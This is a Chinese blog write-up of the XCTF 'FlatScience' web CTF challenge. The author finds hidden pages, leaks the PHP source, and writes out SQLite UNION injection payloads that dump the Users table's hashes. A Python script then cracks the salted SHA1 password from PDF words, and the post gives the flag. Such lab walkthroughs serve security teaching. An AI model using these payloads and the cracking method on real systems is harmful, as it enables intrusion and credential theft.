xctf攻防世界 Web高手进阶区 FlatScience29

最新推荐文章于 2024-04-06 23:00:41 发布
最新推荐文章于 2024-04-06 23:00:41 发布
阅读量637 收藏
点赞数
分类专栏: 攻防世界web之路 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/122260001
版权

这道题真的,无敌了,太尼玛难了,菜鸡哭泣ing

1. 进入环境,查看内容

在这里插入图片描述
一通乱点,查看console,啥都没有,于是想着查看源码,使用.git漏洞,看看有没有东西,如图,啥都没有!
在这里插入图片描述
一顿乱猜,看看robots.txt,有没有什么限制!得到了提示:
在这里插入图片描述
也就是说/login.php和/admin.php是有东西的。

2. 开始解题

  1. 打开/login.php,好家伙,还真有登录页面,如图:

在这里插入图片描述
一顿瞎猜进不去,看看控制台有啥提示,如图:
在这里插入图片描述
TODO是打算移除Debug参数,也就是说,要用到debug参数?常熟输入?debug=xx,

http://111.200.241.244:55853/login.php?debug=xx

如图:
在这里插入图片描述
好家伙,出来了一堆代码:

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>

获取到的最大信息是:

  • 未对参数pw和usr进行过滤。(因此可以猜到,题目想让我们去玩sql注入,拿到信息)
  • 后台的数据库是SQLite3。(提示我们使用SQLite3的注入方式)
  1. 开始进行SQLite3注入
    不太懂这个数据库怎么注入,开始参考大佬们的wp,因为每个sqlite都有sqlite_master表,他是系统表,因此构造payload。
usr=' union select name, name from sqlite_master where type='table'-- &pw=admin

如图:
在这里插入图片描述
可以看到,系统表中使用的表Users表,因此,我们需要知道Users表中包含的内容,于是构造payload:

usr=' union SELECT sql,sql FROM sqlite_master WHERE tbl_name = 'Users' and type = 'table'--&pw=admin

如图:
在这里插入图片描述
复制编码的内容,在hackbar中进行解码,如图:
在这里插入图片描述
也就是说,创建Users表,有四个字段

字段含义
id整型,主键
namevarchar类型,255字符
passwordvarchar类型,255字符
hintvarchar类型,255字符

那么跟着走,查询每个字段的内容和数据

usr=' union select id,group_concat(id) from users--&pw=admin   # 得到所有的id
usr=' union select id,group_concat(name) from users--&pw=admin # 得到所有的name
usr=' union select id,group_concat(password) from users--&pw=admin # 得到所有的password
usr=' union select id,group_concat(hint) from users--&pw=admin # 得到所有的hint

汇总结果:

idnamepasswordhint
1
2
3		admin
fritze
hansi		3fab54a50e770d830c0416df817567662a9dc85c,
54eae8935c90f467427f05e4ece82cf569f89507
34b0bb7c304949f9ff2fc101eef0f048be10d3bd		my+fav+word+in+my+fav+paper?!
my+love+is…?
the+password+is+password
  1. 注入完成后,思考上述表格
    根据前面的代码
$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");

也就是说,要根据查询到的name和查询到的密码,即pass和"Salz!相结合",再经过sha1(),才会得到3fab54a50e770d830c0416df817567662a9dc85c这窜序列,拿到pass,才能登录。。。(此处人已经麻中麻了)如何拿到

  1. 开始思考所给的pdf作用了
    看了大佬们的思路,我们根据后面的hint,我最喜欢的单词在我最喜欢的论文里面。因此我们需要在那些篇论文里面找出一个单词,如果这个单词和Salz连接,然后经过sha1加密和3fab54a50e770d830c0416df817567662a9dc85c一样,那么这个单词就是密码。这里用手肯定是不可能的,只能写(抄)脚本。(已无耐心,直接抄脚本了,麻了)
from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib

def get_pdf():
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print "Searching word in " + i
        pdf_text = convert_pdf_2_text(i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
            if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
                print "Find the password :" + word
                exit()

if __name__ == "__main__":
    find_password()

得到真正的password:ThinJerboa

  1. 登录/admin.php,获取flag
    如图:
    在这里插入图片描述
    flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

3. 总结

  • 考察sql注入
  • 代码审计
  • robots.txt的信息提示

参考博客:

  1. https://blog.csdn.net/hxhxhxhxx/article/details/107846000
  2. https://blog.csdn.net/rfrder/article/details/108562201?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_baidulandingword~default-0.no_search_link&spm=1001.2101.3001.4242.1&utm_relevant_index=3
  3. https://www.freesion.com/article/90921127188/

这个题真的太难了,整了一下午时间,实在跟不上,如有问题,恳请指正。

l8947943
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 858
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
攻防世界-Web高手进阶-FlatScience
feng的博客
09-13 579
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界-FlatScience
qq_44418229的博客
07-24 656
sqlite注入和sql注入的别 sha1()函数的相关内容 setcookie()函数的相关内容
攻防世界FlatScience
最新发布
wangzhemvp的博客
04-06 1116
想到在查看 robots.txt 的时候有个 admin.php,选 admin 来破解,根据 hint 猜测 fav word 藏在前面看到的 pdf 里面,需要写个脚本,把里面的词都给提取出来,拼接上”Salz!想办法把 pdf 文件都给爬下来。输入 http://61.147.171.105:61912/login.php/name 等同于 if 语句中的 id,sql 等同于 name。在login.php 中发现。
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-RE】新手练习-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
攻防世界—-(web进阶FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界 web FlatScience
tothemoon的博客
03-04 386
打开网页后每个转跳都点一下发现都是pdf文件除了here 进入了根目录1,然后点here或者these会进入不同的根目录。 这也太难看出其中的奥秘了,用dirsearch跑一下。 经过测试后:发现login.php与admin.php是解题的关键 ...
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 285
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
XCTF WEB FlatScience(Hack.lu-2017)
A_dmin的博客
12-13 709
XCTF WEB FlatScience(Hack.lu-2017) 打开题目,发现是一堆的跳转and pdf文档: 也没发现有何提示,,,直接robots.txt进行查看: 进行访问,admin.php页面就是admin登录的地方,,,啥都没得,,, 还有一个login.php的页面,,不明白为什么都是登录要搞两个页面,,, 右键查看源代码,得到一个提示: debug调试参数??直接传参?...
[CTF题目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1722
[CTF题目总结-web篇]攻防世界flatscience
攻防世界-web-FlatScience
wuh2333的博客
10-25 412
攻防世界webFlatScience
XCTF Web 记录(FlatScience
ximo的博客
03-08 182
前言 今天开始每日一题,周末不更。 FlatScience 进来以后,一串英文,翻译: 最佳论文 嘿!欢迎来到我的(部分未完成)oldskool网站! 我是Flux Horst教授。。“啊,”努夫说-你应该了解我! 这是我迄今为止写的一些著名论文。 也许你自己去看看?! 试试这个或者这个或者到这里来 然后三个可以点击的位置,进去后时pdf文件,查看页面源码也没什么有用的。 查看robots.txt看看有没有信息: 啊,进去看看。 login.php: admin.php: 这里admin页面直接就
攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 683
攻防世界WEB】四星12分
攻防世界----(web进阶FlatScience--WP
xiaoduanDDG的博客
04-14 483
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到l...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值